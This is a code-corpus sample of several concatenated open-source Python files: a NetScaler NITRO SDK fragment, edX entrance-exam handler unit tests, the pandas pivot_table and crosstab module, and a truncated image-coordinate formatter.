self.rnat6_binding = [rnat6_binding() for _ in range(length)]
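# Hedged usage sketch (assumes the usual nitro_service login flow used
# elsewhere in this SDK; address, credentials and rule name are placeholders):
#
#   from nssrc.com.citrix.netscaler.nitro.service.nitro_service import nitro_service
#   client = nitro_service("203.0.113.5", "http")
#   client.login("nsroot", "nsroot")
#   bindings = rnat6_binding.get(client, "my-rnat6-rule")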
| mahabs/nitro | nssrc/com/citrix/netscaler/nitro/resource/config/network/rnat6_binding.py | Python | apache-2.0 | 3,410 |
from rest_framework import generics
| mattdennewitz/generator-mdtz-fluxible | generators/djapi/templates/views.py | Python | mit | 36 |
"""
Test module for Entrance Exams AJAX callback handler workflows
"""
import json
from mock import patch
from django.conf import settings
from django.contrib.auth.models import User
from django.test.client import RequestFactory
from contentstore.tests.utils import AjaxEnabledTestClient, CourseTestCase
from contentstore.utils import reverse_url
from contentstore.views.entrance_exam import create_entrance_exam, update_entrance_exam, delete_entrance_exam,\
add_entrance_exam_milestone, remove_entrance_exam_milestone_reference
from contentstore.views.helpers import GRADER_TYPES
from models.settings.course_grading import CourseGradingModel
from models.settings.course_metadata import CourseMetadata
from opaque_keys.edx.keys import UsageKey
from student.tests.factories import UserFactory
from util import milestones_helpers
from xmodule.modulestore.django import modulestore
from contentstore.views.helpers import create_xblock
from milestones.tests.utils import MilestonesTestCaseMixin
@patch.dict(settings.FEATURES, {'ENTRANCE_EXAMS': True})
class EntranceExamHandlerTests(CourseTestCase, MilestonesTestCaseMixin):
"""
Base test class for create, save, and delete
"""
def setUp(self):
"""
Shared scaffolding for individual test runs
"""
super(EntranceExamHandlerTests, self).setUp()
self.course_key = self.course.id
self.usage_key = self.course.location
self.course_url = '/course/{}'.format(unicode(self.course.id))
self.exam_url = '/course/{}/entrance_exam/'.format(unicode(self.course.id))
self.milestone_relationship_types = milestones_helpers.get_milestone_relationship_types()
def test_entrance_exam_milestone_addition(self):
"""
Unit Test: test addition of entrance exam milestone content
"""
parent_locator = unicode(self.course.location)
created_block = create_xblock(
parent_locator=parent_locator,
user=self.user,
category='chapter',
display_name=('Entrance Exam'),
is_entrance_exam=True
)
add_entrance_exam_milestone(self.course.id, created_block)
content_milestones = milestones_helpers.get_course_content_milestones(
unicode(self.course.id),
unicode(created_block.location),
self.milestone_relationship_types['FULFILLS']
)
self.assertTrue(len(content_milestones))
self.assertEqual(len(milestones_helpers.get_course_milestones(self.course.id)), 1)
def test_entrance_exam_milestone_removal(self):
"""
Unit Test: test removal of entrance exam milestone content
"""
parent_locator = unicode(self.course.location)
created_block = create_xblock(
parent_locator=parent_locator,
user=self.user,
category='chapter',
display_name=('Entrance Exam'),
is_entrance_exam=True
)
add_entrance_exam_milestone(self.course.id, created_block)
content_milestones = milestones_helpers.get_course_content_milestones(
unicode(self.course.id),
unicode(created_block.location),
self.milestone_relationship_types['FULFILLS']
)
self.assertEqual(len(content_milestones), 1)
user = UserFactory()
request = RequestFactory().request()
request.user = user
remove_entrance_exam_milestone_reference(request, self.course.id)
content_milestones = milestones_helpers.get_course_content_milestones(
unicode(self.course.id),
unicode(created_block.location),
self.milestone_relationship_types['FULFILLS']
)
self.assertEqual(len(content_milestones), 0)
def test_contentstore_views_entrance_exam_post(self):
"""
Unit Test: test_contentstore_views_entrance_exam_post
"""
resp = self.client.post(self.exam_url, {}, http_accept='application/json')
self.assertEqual(resp.status_code, 201)
resp = self.client.get(self.exam_url)
self.assertEqual(resp.status_code, 200)
# Reload the test course now that the exam module has been added
self.course = modulestore().get_course(self.course.id)
metadata = CourseMetadata.fetch_all(self.course)
self.assertTrue(metadata['entrance_exam_enabled'])
self.assertIsNotNone(metadata['entrance_exam_minimum_score_pct'])
self.assertIsNotNone(metadata['entrance_exam_id']['value'])
self.assertTrue(len(milestones_helpers.get_course_milestones(unicode(self.course.id))))
content_milestones = milestones_helpers.get_course_content_milestones(
unicode(self.course.id),
metadata['entrance_exam_id']['value'],
self.milestone_relationship_types['FULFILLS']
)
self.assertTrue(len(content_milestones))
def test_contentstore_views_entrance_exam_post_new_sequential_confirm_grader(self):
"""
Unit Test: test_contentstore_views_entrance_exam_post
"""
resp = self.client.post(self.exam_url, {}, http_accept='application/json')
self.assertEqual(resp.status_code, 201)
resp = self.client.get(self.exam_url)
self.assertEqual(resp.status_code, 200)
# Reload the test course now that the exam module has been added
self.course = modulestore().get_course(self.course.id)
# Add a new child sequential to the exam module
# Confirm that the grader type is 'Entrance Exam'
chapter_locator_string = json.loads(resp.content).get('locator')
# chapter_locator = UsageKey.from_string(chapter_locator_string)
seq_data = {
'category': "sequential",
'display_name': "Entrance Exam Subsection",
'parent_locator': chapter_locator_string,
}
resp = self.client.ajax_post(reverse_url('xblock_handler'), seq_data)
seq_locator_string = json.loads(resp.content).get('locator')
seq_locator = UsageKey.from_string(seq_locator_string)
section_grader_type = CourseGradingModel.get_section_grader_type(seq_locator)
self.assertEqual(GRADER_TYPES['ENTRANCE_EXAM'], section_grader_type['graderType'])
def test_contentstore_views_entrance_exam_get(self):
"""
Unit Test: test_contentstore_views_entrance_exam_get
"""
resp = self.client.post(
self.exam_url,
{'entrance_exam_minimum_score_pct': settings.ENTRANCE_EXAM_MIN_SCORE_PCT},
http_accept='application/json'
)
self.assertEqual(resp.status_code, 201)
resp = self.client.get(self.exam_url)
self.assertEqual(resp.status_code, 200)
def test_contentstore_views_entrance_exam_delete(self):
"""
Unit Test: test_contentstore_views_entrance_exam_delete
"""
resp = self.client.post(self.exam_url, {}, http_accept='application/json')
self.assertEqual(resp.status_code, 201)
resp = self.client.get(self.exam_url)
self.assertEqual(resp.status_code, 200)
resp = self.client.delete(self.exam_url)
self.assertEqual(resp.status_code, 204)
resp = self.client.get(self.exam_url)
self.assertEqual(resp.status_code, 404)
user = User.objects.create(
username='test_user',
email='test_user@edx.org',
is_active=True,
)
user.set_password('test')
user.save()
milestones = milestones_helpers.get_course_milestones(unicode(self.course_key))
self.assertEqual(len(milestones), 1)
milestone_key = '{}.{}'.format(milestones[0]['namespace'], milestones[0]['name'])
paths = milestones_helpers.get_course_milestones_fulfillment_paths(
unicode(self.course_key),
milestones_helpers.serialize_user(user)
)
# What we have now is a course milestone requirement and no valid fulfillment
# paths for the specified user. The LMS is going to have to ignore this situation,
        # because we can't confidently prevent it from occurring at some point in the future.
# milestone_key_1 =
self.assertEqual(len(paths[milestone_key]), 0)
# Re-adding an entrance exam to the course should fix the missing link
# It wipes out any old entrance exam artifacts and inserts a new exam course chapter/module
resp = self.client.post(self.exam_url, {}, http_accept='application/json')
self.assertEqual(resp.status_code, 201)
resp = self.client.get(self.exam_url)
self.assertEqual(resp.status_code, 200)
# Confirm that we have only one Entrance Exam grader after re-adding the exam (validates SOL-475)
graders = CourseGradingModel.fetch(self.course_key).graders
count = 0
for grader in graders:
if grader['type'] == GRADER_TYPES['ENTRANCE_EXAM']:
count += 1
self.assertEqual(count, 1)
def test_contentstore_views_entrance_exam_delete_bogus_course(self):
"""
Unit Test: test_contentstore_views_entrance_exam_delete_bogus_course
"""
resp = self.client.delete('/course/bad/course/key/entrance_exam')
self.assertEqual(resp.status_code, 400)
def test_contentstore_views_entrance_exam_get_bogus_course(self):
"""
Unit Test: test_contentstore_views_entrance_exam_get_bogus_course
"""
resp = self.client.get('/course/bad/course/key/entrance_exam')
self.assertEqual(resp.status_code, 400)
def test_contentstore_views_entrance_exam_get_bogus_exam(self):
"""
Unit Test: test_contentstore_views_entrance_exam_get_bogus_exam
"""
resp = self.client.post(
self.exam_url,
{'entrance_exam_minimum_score_pct': '50'},
http_accept='application/json'
)
self.assertEqual(resp.status_code, 201)
resp = self.client.get(self.exam_url)
self.assertEqual(resp.status_code, 200)
self.course = modulestore().get_course(self.course.id)
# Should raise an ItemNotFoundError and return a 404
updated_metadata = {'entrance_exam_id': 'i4x://org.4/course_4/chapter/ed7c4c6a4d68409998e2c8554c4629d1'}
CourseMetadata.update_from_dict(
updated_metadata,
self.course,
self.user,
)
self.course = modulestore().get_course(self.course.id)
resp = self.client.get(self.exam_url)
self.assertEqual(resp.status_code, 404)
# Should raise an InvalidKeyError and return a 404
updated_metadata = {'entrance_exam_id': '123afsdfsad90f87'}
CourseMetadata.update_from_dict(
updated_metadata,
self.course,
self.user,
)
self.course = modulestore().get_course(self.course.id)
resp = self.client.get(self.exam_url)
self.assertEqual(resp.status_code, 404)
def test_contentstore_views_entrance_exam_post_bogus_course(self):
"""
Unit Test: test_contentstore_views_entrance_exam_post_bogus_course
"""
resp = self.client.post(
'/course/bad/course/key/entrance_exam',
{},
http_accept='application/json'
)
self.assertEqual(resp.status_code, 400)
def test_contentstore_views_entrance_exam_post_invalid_http_accept(self):
"""
Unit Test: test_contentstore_views_entrance_exam_post_invalid_http_accept
"""
resp = self.client.post(
'/course/bad/course/key/entrance_exam',
{},
http_accept='text/html'
)
self.assertEqual(resp.status_code, 400)
def test_contentstore_views_entrance_exam_get_invalid_user(self):
"""
Unit Test: test_contentstore_views_entrance_exam_get_invalid_user
"""
user = User.objects.create(
username='test_user',
email='test_user@edx.org',
is_active=True,
)
user.set_password('test')
user.save()
self.client = AjaxEnabledTestClient()
self.client.login(username='test_user', password='test')
resp = self.client.get(self.exam_url)
self.assertEqual(resp.status_code, 403)
def test_contentstore_views_entrance_exam_unsupported_method(self):
"""
Unit Test: test_contentstore_views_entrance_exam_unsupported_method
"""
resp = self.client.put(self.exam_url)
self.assertEqual(resp.status_code, 405)
def test_entrance_exam_view_direct_missing_score_setting(self):
"""
Unit Test: test_entrance_exam_view_direct_missing_score_setting
"""
user = UserFactory()
user.is_staff = True
request = RequestFactory()
request.user = user
resp = create_entrance_exam(request, self.course.id, None)
self.assertEqual(resp.status_code, 201)
@patch.dict('django.conf.settings.FEATURES', {'ENTRANCE_EXAMS': False})
def test_entrance_exam_feature_flag_gating(self):
user = UserFactory()
user.is_staff = True
request = RequestFactory()
request.user = user
resp = self.client.get(self.exam_url)
self.assertEqual(resp.status_code, 400)
resp = create_entrance_exam(request, self.course.id, None)
self.assertEqual(resp.status_code, 400)
resp = delete_entrance_exam(request, self.course.id)
self.assertEqual(resp.status_code, 400)
# No return, so we'll just ensure no exception is thrown
update_entrance_exam(request, self.course.id, {})
| solashirai/edx-platform | cms/djangoapps/contentstore/views/tests/test_entrance_exam.py | Python | agpl-3.0 | 13,750 |
from __future__ import annotations
from typing import (
TYPE_CHECKING,
Callable,
Hashable,
Sequence,
cast,
)
import numpy as np
from pandas._typing import (
AggFuncType,
AggFuncTypeBase,
AggFuncTypeDict,
IndexLabel,
)
from pandas.util._decorators import (
Appender,
Substitution,
)
from pandas.core.dtypes.cast import maybe_downcast_to_dtype
from pandas.core.dtypes.common import (
is_integer_dtype,
is_list_like,
is_nested_list_like,
is_scalar,
)
from pandas.core.dtypes.generic import (
ABCDataFrame,
ABCSeries,
)
import pandas.core.common as com
from pandas.core.frame import _shared_docs
from pandas.core.groupby import Grouper
from pandas.core.indexes.api import (
Index,
MultiIndex,
get_objs_combined_axis,
)
from pandas.core.reshape.concat import concat
from pandas.core.reshape.util import cartesian_product
from pandas.core.series import Series
if TYPE_CHECKING:
from pandas import DataFrame
# Note: We need to make sure `frame` is imported before `pivot`, otherwise
# _shared_docs['pivot_table'] will not yet exist. TODO: Fix this dependency
@Substitution("\ndata : DataFrame")
@Appender(_shared_docs["pivot_table"], indents=1)
def pivot_table(
data: DataFrame,
values=None,
index=None,
columns=None,
aggfunc: AggFuncType = "mean",
fill_value=None,
margins=False,
dropna=True,
margins_name="All",
observed=False,
sort=True,
) -> DataFrame:
index = _convert_by(index)
columns = _convert_by(columns)
if isinstance(aggfunc, list):
pieces: list[DataFrame] = []
keys = []
for func in aggfunc:
_table = __internal_pivot_table(
data,
values=values,
index=index,
columns=columns,
fill_value=fill_value,
aggfunc=func,
margins=margins,
dropna=dropna,
margins_name=margins_name,
observed=observed,
sort=sort,
)
pieces.append(_table)
keys.append(getattr(func, "__name__", func))
table = concat(pieces, keys=keys, axis=1)
return table.__finalize__(data, method="pivot_table")
table = __internal_pivot_table(
data,
values,
index,
columns,
aggfunc,
fill_value,
margins,
dropna,
margins_name,
observed,
sort,
)
return table.__finalize__(data, method="pivot_table")
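# Hedged usage sketch (editor's addition, not part of pandas; the frame and
# column names below are hypothetical):
#
#     df = DataFrame({"A": ["x", "x", "y"], "B": [1, 2, 3]})
#     pivot_table(df, values="B", index="A", aggfunc="sum")
#     # -> one row per unique value of "A", holding the sum of "B"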
def __internal_pivot_table(
data: DataFrame,
values,
index,
columns,
aggfunc: AggFuncTypeBase | AggFuncTypeDict,
fill_value,
margins: bool,
dropna: bool,
margins_name: str,
observed: bool,
sort: bool,
) -> DataFrame:
"""
Helper of :func:`pandas.pivot_table` for any non-list ``aggfunc``.
"""
keys = index + columns
values_passed = values is not None
if values_passed:
if is_list_like(values):
values_multi = True
values = list(values)
else:
values_multi = False
values = [values]
# GH14938 Make sure value labels are in data
for i in values:
if i not in data:
raise KeyError(i)
to_filter = []
for x in keys + values:
if isinstance(x, Grouper):
x = x.key
try:
if x in data:
to_filter.append(x)
except TypeError:
pass
if len(to_filter) < len(data.columns):
data = data[to_filter]
else:
values = data.columns
for key in keys:
try:
values = values.drop(key)
except (TypeError, ValueError, KeyError):
pass
values = list(values)
grouped = data.groupby(keys, observed=observed, sort=sort)
agged = grouped.agg(aggfunc)
if dropna and isinstance(agged, ABCDataFrame) and len(agged.columns):
agged = agged.dropna(how="all")
# gh-21133
# we want to down cast if
# the original values are ints
# as we grouped with a NaN value
# and then dropped, coercing to floats
for v in values:
if (
v in data
and is_integer_dtype(data[v])
and v in agged
and not is_integer_dtype(agged[v])
):
if isinstance(agged[v], ABCDataFrame):
# exclude DataFrame case bc maybe_downcast_to_dtype expects
# ArrayLike
# TODO: why does test_pivot_table_doctest_case fail if
# we don't do this apparently-unnecessary setitem?
agged[v] = agged[v]
else:
agged[v] = maybe_downcast_to_dtype(agged[v], data[v].dtype)
table = agged
# GH17038, this check should only happen if index is defined (not None)
if table.index.nlevels > 1 and index:
# Related GH #17123
# If index_names are integers, determine whether the integers refer
# to the level position or name.
index_names = agged.index.names[: len(index)]
to_unstack = []
for i in range(len(index), len(keys)):
name = agged.index.names[i]
if name is None or name in index_names:
to_unstack.append(i)
else:
to_unstack.append(name)
table = agged.unstack(to_unstack)
if not dropna:
if isinstance(table.index, MultiIndex):
m = MultiIndex.from_arrays(
cartesian_product(table.index.levels), names=table.index.names
)
table = table.reindex(m, axis=0)
if isinstance(table.columns, MultiIndex):
m = MultiIndex.from_arrays(
cartesian_product(table.columns.levels), names=table.columns.names
)
table = table.reindex(m, axis=1)
if isinstance(table, ABCDataFrame):
table = table.sort_index(axis=1)
if fill_value is not None:
_table = table.fillna(fill_value, downcast="infer")
assert _table is not None # needed for mypy
table = _table
if margins:
if dropna:
data = data[data.notna().all(axis=1)]
table = _add_margins(
table,
data,
values,
rows=index,
cols=columns,
aggfunc=aggfunc,
observed=dropna,
margins_name=margins_name,
fill_value=fill_value,
)
# discard the top level
if values_passed and not values_multi and table.columns.nlevels > 1:
table = table.droplevel(0, axis=1)
if len(index) == 0 and len(columns) > 0:
table = table.T
# GH 15193 Make sure empty columns are removed if dropna=True
if isinstance(table, ABCDataFrame) and dropna:
table = table.dropna(how="all", axis=1)
return table
def _add_margins(
table: DataFrame | Series,
data,
values,
rows,
cols,
aggfunc,
observed=None,
margins_name: str = "All",
fill_value=None,
):
if not isinstance(margins_name, str):
raise ValueError("margins_name argument must be a string")
msg = f'Conflicting name "{margins_name}" in margins'
for level in table.index.names:
if margins_name in table.index.get_level_values(level):
raise ValueError(msg)
grand_margin = _compute_grand_margin(data, values, aggfunc, margins_name)
if table.ndim == 2:
# i.e. DataFrame
for level in table.columns.names[1:]:
if margins_name in table.columns.get_level_values(level):
raise ValueError(msg)
key: str | tuple[str, ...]
if len(rows) > 1:
key = (margins_name,) + ("",) * (len(rows) - 1)
else:
key = margins_name
if not values and isinstance(table, ABCSeries):
# If there are no values and the table is a series, then there is only
# one column in the data. Compute grand margin and return it.
return table.append(Series({key: grand_margin[margins_name]}))
elif values:
marginal_result_set = _generate_marginal_results(
table, data, values, rows, cols, aggfunc, observed, margins_name
)
if not isinstance(marginal_result_set, tuple):
return marginal_result_set
result, margin_keys, row_margin = marginal_result_set
else:
# no values, and table is a DataFrame
assert isinstance(table, ABCDataFrame)
marginal_result_set = _generate_marginal_results_without_values(
table, data, rows, cols, aggfunc, observed, margins_name
)
if not isinstance(marginal_result_set, tuple):
return marginal_result_set
result, margin_keys, row_margin = marginal_result_set
row_margin = row_margin.reindex(result.columns, fill_value=fill_value)
# populate grand margin
for k in margin_keys:
if isinstance(k, str):
row_margin[k] = grand_margin[k]
else:
row_margin[k] = grand_margin[k[0]]
from pandas import DataFrame
margin_dummy = DataFrame(row_margin, columns=[key]).T
row_names = result.index.names
# check the result column and leave floats
for dtype in set(result.dtypes):
cols = result.select_dtypes([dtype]).columns
margin_dummy[cols] = margin_dummy[cols].apply(
maybe_downcast_to_dtype, args=(dtype,)
)
result = result.append(margin_dummy)
result.index.names = row_names
return result
def _compute_grand_margin(data, values, aggfunc, margins_name: str = "All"):
if values:
grand_margin = {}
for k, v in data[values].items():
try:
if isinstance(aggfunc, str):
grand_margin[k] = getattr(v, aggfunc)()
elif isinstance(aggfunc, dict):
if isinstance(aggfunc[k], str):
grand_margin[k] = getattr(v, aggfunc[k])()
else:
grand_margin[k] = aggfunc[k](v)
else:
grand_margin[k] = aggfunc(v)
except TypeError:
pass
return grand_margin
else:
return {margins_name: aggfunc(data.index)}
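# Hedged example (editor's addition): with values=["x"] and aggfunc="sum",
# _compute_grand_margin returns {"x": data["x"].sum()}; with no values it
# falls back to {margins_name: aggfunc(data.index)}.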
def _generate_marginal_results(
table, data, values, rows, cols, aggfunc, observed, margins_name: str = "All"
):
if len(cols) > 0:
# need to "interleave" the margins
table_pieces = []
margin_keys = []
def _all_key(key):
return (key, margins_name) + ("",) * (len(cols) - 1)
if len(rows) > 0:
margin = data[rows + values].groupby(rows, observed=observed).agg(aggfunc)
cat_axis = 1
for key, piece in table.groupby(level=0, axis=cat_axis, observed=observed):
all_key = _all_key(key)
# we are going to mutate this, so need to copy!
piece = piece.copy()
piece[all_key] = margin[key]
table_pieces.append(piece)
margin_keys.append(all_key)
else:
from pandas import DataFrame
cat_axis = 0
for key, piece in table.groupby(level=0, axis=cat_axis, observed=observed):
if len(cols) > 1:
all_key = _all_key(key)
else:
all_key = margins_name
table_pieces.append(piece)
# GH31016 this is to calculate margin for each group, and assign
# corresponded key as index
transformed_piece = DataFrame(piece.apply(aggfunc)).T
transformed_piece.index = Index([all_key], name=piece.index.name)
# append piece for margin into table_piece
table_pieces.append(transformed_piece)
margin_keys.append(all_key)
result = concat(table_pieces, axis=cat_axis)
if len(rows) == 0:
return result
else:
result = table
margin_keys = table.columns
if len(cols) > 0:
row_margin = data[cols + values].groupby(cols, observed=observed).agg(aggfunc)
row_margin = row_margin.stack()
# slight hack
new_order = [len(cols)] + list(range(len(cols)))
row_margin.index = row_margin.index.reorder_levels(new_order)
else:
row_margin = Series(np.nan, index=result.columns)
return result, margin_keys, row_margin
def _generate_marginal_results_without_values(
table: DataFrame, data, rows, cols, aggfunc, observed, margins_name: str = "All"
):
if len(cols) > 0:
# need to "interleave" the margins
margin_keys: list | Index = []
def _all_key():
if len(cols) == 1:
return margins_name
return (margins_name,) + ("",) * (len(cols) - 1)
if len(rows) > 0:
margin = data[rows].groupby(rows, observed=observed).apply(aggfunc)
all_key = _all_key()
table[all_key] = margin
result = table
margin_keys.append(all_key)
else:
margin = data.groupby(level=0, axis=0, observed=observed).apply(aggfunc)
all_key = _all_key()
table[all_key] = margin
result = table
margin_keys.append(all_key)
return result
else:
result = table
margin_keys = table.columns
if len(cols):
row_margin = data[cols].groupby(cols, observed=observed).apply(aggfunc)
else:
row_margin = Series(np.nan, index=result.columns)
return result, margin_keys, row_margin
def _convert_by(by):
if by is None:
by = []
elif (
is_scalar(by)
or isinstance(by, (np.ndarray, Index, ABCSeries, Grouper))
or callable(by)
):
by = [by]
else:
by = list(by)
return by
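# Hedged examples (editor's addition): _convert_by(None) -> [],
# _convert_by("a") -> ["a"], and any other list-like input is returned as
# list(by).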
@Substitution("\ndata : DataFrame")
@Appender(_shared_docs["pivot"], indents=1)
def pivot(
data: DataFrame,
index: IndexLabel | None = None,
columns: IndexLabel | None = None,
values: IndexLabel | None = None,
) -> DataFrame:
if columns is None:
raise TypeError("pivot() missing 1 required argument: 'columns'")
columns_listlike = com.convert_to_list_like(columns)
if values is None:
if index is not None:
cols = com.convert_to_list_like(index)
else:
cols = []
append = index is None
# error: Unsupported operand types for + ("List[Any]" and "ExtensionArray")
# error: Unsupported left operand type for + ("ExtensionArray")
indexed = data.set_index(
cols + columns_listlike, append=append # type: ignore[operator]
)
else:
if index is None:
index_list = [Series(data.index, name=data.index.name)]
else:
index_list = [data[idx] for idx in com.convert_to_list_like(index)]
data_columns = [data[col] for col in columns_listlike]
index_list.extend(data_columns)
multiindex = MultiIndex.from_arrays(index_list)
if is_list_like(values) and not isinstance(values, tuple):
# Exclude tuple because it is seen as a single column name
values = cast(Sequence[Hashable], values)
indexed = data._constructor(
data[values]._values, index=multiindex, columns=values
)
else:
indexed = data._constructor_sliced(data[values]._values, index=multiindex)
return indexed.unstack(columns_listlike)
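# Hedged usage sketch (editor's addition; column names are hypothetical):
#
#     df = DataFrame({"k": ["a", "b"], "v": [1, 2]})
#     pivot(df, columns="k", values="v")
#     # -> one column per unique value of "k", indexed by the original index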
def crosstab(
index,
columns,
values=None,
rownames=None,
colnames=None,
aggfunc=None,
margins=False,
margins_name: str = "All",
dropna: bool = True,
normalize=False,
) -> DataFrame:
"""
Compute a simple cross tabulation of two (or more) factors. By default
computes a frequency table of the factors unless an array of values and an
aggregation function are passed.
Parameters
----------
index : array-like, Series, or list of arrays/Series
Values to group by in the rows.
columns : array-like, Series, or list of arrays/Series
Values to group by in the columns.
values : array-like, optional
Array of values to aggregate according to the factors.
Requires `aggfunc` be specified.
rownames : sequence, default None
If passed, must match number of row arrays passed.
colnames : sequence, default None
If passed, must match number of column arrays passed.
aggfunc : function, optional
If specified, requires `values` be specified as well.
margins : bool, default False
Add row/column margins (subtotals).
margins_name : str, default 'All'
Name of the row/column that will contain the totals
when margins is True.
dropna : bool, default True
Do not include columns whose entries are all NaN.
normalize : bool, {'all', 'index', 'columns'}, or {0,1}, default False
Normalize by dividing all values by the sum of values.
- If passed 'all' or `True`, will normalize over all values.
- If passed 'index' will normalize over each row.
- If passed 'columns' will normalize over each column.
- If margins is `True`, will also normalize margin values.
Returns
-------
DataFrame
Cross tabulation of the data.
See Also
--------
DataFrame.pivot : Reshape data based on column values.
pivot_table : Create a pivot table as a DataFrame.
Notes
-----
Any Series passed will have their name attributes used unless row or column
names for the cross-tabulation are specified.
Any input passed containing Categorical data will have **all** of its
categories included in the cross-tabulation, even if the actual data does
not contain any instances of a particular category.
In the event that there aren't overlapping indexes an empty DataFrame will
be returned.
Examples
--------
>>> a = np.array(["foo", "foo", "foo", "foo", "bar", "bar",
... "bar", "bar", "foo", "foo", "foo"], dtype=object)
>>> b = np.array(["one", "one", "one", "two", "one", "one",
... "one", "two", "two", "two", "one"], dtype=object)
>>> c = np.array(["dull", "dull", "shiny", "dull", "dull", "shiny",
... "shiny", "dull", "shiny", "shiny", "shiny"],
... dtype=object)
>>> pd.crosstab(a, [b, c], rownames=['a'], colnames=['b', 'c'])
b one two
c dull shiny dull shiny
a
bar 1 2 1 0
foo 2 2 1 2
Here 'c' and 'f' are not represented in the data and will not be
shown in the output because dropna is True by default. Set
dropna=False to preserve categories with no data.
>>> foo = pd.Categorical(['a', 'b'], categories=['a', 'b', 'c'])
>>> bar = pd.Categorical(['d', 'e'], categories=['d', 'e', 'f'])
>>> pd.crosstab(foo, bar)
col_0 d e
row_0
a 1 0
b 0 1
>>> pd.crosstab(foo, bar, dropna=False)
col_0 d e f
row_0
a 1 0 0
b 0 1 0
c 0 0 0
"""
if values is None and aggfunc is not None:
raise ValueError("aggfunc cannot be used without values.")
if values is not None and aggfunc is None:
raise ValueError("values cannot be used without an aggfunc.")
if not is_nested_list_like(index):
index = [index]
if not is_nested_list_like(columns):
columns = [columns]
common_idx = None
pass_objs = [x for x in index + columns if isinstance(x, (ABCSeries, ABCDataFrame))]
if pass_objs:
common_idx = get_objs_combined_axis(pass_objs, intersect=True, sort=False)
rownames = _get_names(index, rownames, prefix="row")
colnames = _get_names(columns, colnames, prefix="col")
# duplicate names mapped to unique names for pivot op
(
rownames_mapper,
unique_rownames,
colnames_mapper,
unique_colnames,
) = _build_names_mapper(rownames, colnames)
from pandas import DataFrame
data = {
**dict(zip(unique_rownames, index)),
**dict(zip(unique_colnames, columns)),
}
df = DataFrame(data, index=common_idx)
if values is None:
df["__dummy__"] = 0
kwargs = {"aggfunc": len, "fill_value": 0}
else:
df["__dummy__"] = values
kwargs = {"aggfunc": aggfunc}
table = df.pivot_table(
"__dummy__",
index=unique_rownames,
columns=unique_colnames,
margins=margins,
margins_name=margins_name,
dropna=dropna,
**kwargs,
)
# Post-process
if normalize is not False:
table = _normalize(
table, normalize=normalize, margins=margins, margins_name=margins_name
)
table = table.rename_axis(index=rownames_mapper, axis=0)
table = table.rename_axis(columns=colnames_mapper, axis=1)
return table
def _normalize(table, normalize, margins: bool, margins_name="All"):
if not isinstance(normalize, (bool, str)):
axis_subs = {0: "index", 1: "columns"}
try:
normalize = axis_subs[normalize]
except KeyError as err:
raise ValueError("Not a valid normalize argument") from err
if margins is False:
# Actual Normalizations
normalizers: dict[bool | str, Callable] = {
"all": lambda x: x / x.sum(axis=1).sum(axis=0),
"columns": lambda x: x / x.sum(),
"index": lambda x: x.div(x.sum(axis=1), axis=0),
}
normalizers[True] = normalizers["all"]
try:
f = normalizers[normalize]
except KeyError as err:
raise ValueError("Not a valid normalize argument") from err
table = f(table)
table = table.fillna(0)
elif margins is True:
# keep index and column of pivoted table
table_index = table.index
table_columns = table.columns
last_ind_or_col = table.iloc[-1, :].name
# check if margin name is not in (for MI cases) and not equal to last
# index/column and save the column and index margin
if (margins_name not in last_ind_or_col) & (margins_name != last_ind_or_col):
raise ValueError(f"{margins_name} not in pivoted DataFrame")
column_margin = table.iloc[:-1, -1]
index_margin = table.iloc[-1, :-1]
# keep the core table
table = table.iloc[:-1, :-1]
# Normalize core
table = _normalize(table, normalize=normalize, margins=False)
# Fix Margins
if normalize == "columns":
column_margin = column_margin / column_margin.sum()
table = concat([table, column_margin], axis=1)
table = table.fillna(0)
table.columns = table_columns
elif normalize == "index":
index_margin = index_margin / index_margin.sum()
table = table.append(index_margin)
table = table.fillna(0)
table.index = table_index
elif normalize == "all" or normalize is True:
column_margin = column_margin / column_margin.sum()
index_margin = index_margin / index_margin.sum()
index_margin.loc[margins_name] = 1
table = concat([table, column_margin], axis=1)
table = table.append(index_margin)
table = table.fillna(0)
table.index = table_index
table.columns = table_columns
else:
raise ValueError("Not a valid normalize argument")
else:
raise ValueError("Not a valid margins argument")
return table
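# Hedged example (editor's addition): for a 2x2 count table [[1, 1], [2, 2]],
# _normalize(table, normalize="index", margins=False) divides each row by its
# row sum, yielding [[0.5, 0.5], [0.5, 0.5]].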
def _get_names(arrs, names, prefix: str = "row"):
if names is None:
names = []
for i, arr in enumerate(arrs):
if isinstance(arr, ABCSeries) and arr.name is not None:
names.append(arr.name)
else:
names.append(f"{prefix}_{i}")
else:
if len(names) != len(arrs):
raise AssertionError("arrays and names must have the same length")
if not isinstance(names, list):
names = list(names)
return names
def _build_names_mapper(
rownames: list[str], colnames: list[str]
) -> tuple[dict[str, str], list[str], dict[str, str], list[str]]:
"""
Given the names of a DataFrame's rows and columns, returns a set of unique row
and column names and mappers that convert to original names.
A row or column name is replaced if it is duplicate among the rows of the inputs,
among the columns of the inputs or between the rows and the columns.
Parameters
----------
rownames: list[str]
colnames: list[str]
Returns
-------
Tuple(Dict[str, str], List[str], Dict[str, str], List[str])
rownames_mapper: dict[str, str]
a dictionary with new row names as keys and original rownames as values
unique_rownames: list[str]
a list of rownames with duplicate names replaced by dummy names
colnames_mapper: dict[str, str]
a dictionary with new column names as keys and original column names as values
unique_colnames: list[str]
a list of column names with duplicate names replaced by dummy names
"""
    def get_duplicates(names):
        seen: set = set()
        # `seen.add` returns None, so the `or` keeps a name only after it has
        # already been seen; the original comprehension never updated `seen`
        # and so returned every name instead of just the duplicates
        return {name for name in names if name in seen or seen.add(name)}
shared_names = set(rownames).intersection(set(colnames))
dup_names = get_duplicates(rownames) | get_duplicates(colnames) | shared_names
rownames_mapper = {
f"row_{i}": name for i, name in enumerate(rownames) if name in dup_names
}
unique_rownames = [
f"row_{i}" if name in dup_names else name for i, name in enumerate(rownames)
]
colnames_mapper = {
f"col_{i}": name for i, name in enumerate(colnames) if name in dup_names
}
unique_colnames = [
f"col_{i}" if name in dup_names else name for i, name in enumerate(colnames)
]
return rownames_mapper, unique_rownames, colnames_mapper, unique_colnames
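# Hedged worked example (editor's addition): with rownames=["a", "b"] and
# colnames=["b"], the shared name "b" is a duplicate, so the function returns
# ({"row_1": "b"}, ["a", "row_1"], {"col_0": "b"}, ["col_0"]).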
| jorisvandenbossche/pandas | pandas/core/reshape/pivot.py | Python | bsd-3-clause | 26,402 |
class formatCoord:
    """Build status-bar coordinate strings for image data (a matplotlib format_coord helper)."""
    def __init__(self, X):
        self.X = X
        self.numrows, self.numcols = self.X.shape[0:2]
    def update_coord(self, x, y):
        col = int(x + 0.5)
        row = int(y + 0.5)
        if 0 <= col < self.numcols and 0 <= row < self.numrows:
            z = self.X[row, col]
            try:
